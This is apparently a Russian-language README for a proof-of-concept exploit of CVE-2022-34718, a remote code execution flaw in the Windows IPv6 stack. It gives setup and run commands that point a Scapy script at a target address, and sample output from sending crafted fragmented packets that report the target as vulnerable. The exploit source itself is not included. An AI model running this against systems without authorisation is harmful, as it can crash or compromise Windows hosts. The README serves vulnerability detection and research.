
Эксплойт доказательства концепции для CVE-2022-34718, уязвимости удаленного выполнения кода в стеке IPv6 Windows. Использует Scapy для отправки специально созданных фрагментированных IPv6-пакетов и обнаружения уязвимых систем.
Этот репозиторий содержит эксплойт для CVE-2022-34718, уязвимости удалённого выполнения кода (RCE) в IPv6 на системах Windows.
Поскольку уязвимость требует специально сформированных IPv6-пакетов, она зависит от модуля Scapy и поэтому должна запускаться от root. Рекомендуемый способ запуска этого PoC — через виртуальную среду, например так:
# virtualenv PoC
# source PoC/bin/activate
(PoC) # pip3 install -r requirements.txt
(PoC) # python3 ipv6-rce-poc.py <target address>
Скрипт сообщит вам, уязвима ли целевая система к этой эксплойту.
[...]
**** inner_frag_id: 0x24944eac
Preparing frags...
Sending 64 frags...
.
Sent 1 packets.
[...]
Sent 1 packets.
Now sending the last inner fragment to trigger the bug...
.
Sent 1 packets.
Success! The system is vulnerable...